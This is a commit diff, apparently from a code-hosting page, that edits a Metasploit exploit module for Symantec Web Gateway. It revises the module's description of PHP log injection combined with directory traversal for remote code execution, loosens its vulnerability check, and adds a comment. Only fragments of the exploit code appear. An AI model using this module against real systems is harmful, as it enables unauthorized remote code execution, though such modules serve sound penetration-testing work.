Fix check
parent
96d70e5fb6
commit
34c93d8e44
|
@ -19,8 +19,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits a vulnerability found in Symantec Web Gateway's HTTP
|
||||
service. By injecting PHP code in the access log, it is possible to load it
|
||||
with a directory traversal flaw, which allows remote code execution under the
|
||||
context of 'apache'. Please note that it may take a few minutes to get a
|
||||
shell back.
|
||||
context of 'apache'. Please note that it may take up to several minutes to
|
||||
retrieve access_log, which is about the amount of time required to see a shell
|
||||
back.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -63,8 +64,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => '/spywall/login.php'
|
||||
})
|
||||
|
||||
if res and res.body =~ /Symantec Web Gateway/ and res.body =~ /Version 5\.0\.2\.\d/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/
|
||||
return Exploit::CheckCode::Detected
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
@ -86,6 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
select(nil, nil, nil, 1)
|
||||
|
||||
# Use the directory traversal to load the PHP code
|
||||
# access_log takes a long time to retrieve
|
||||
print_status("#{peer} - Loading PHP code..")
|
||||
send_request_raw({
|
||||
'method' => 'GET',
|
||||
|
|
Loading…
Reference in New Issue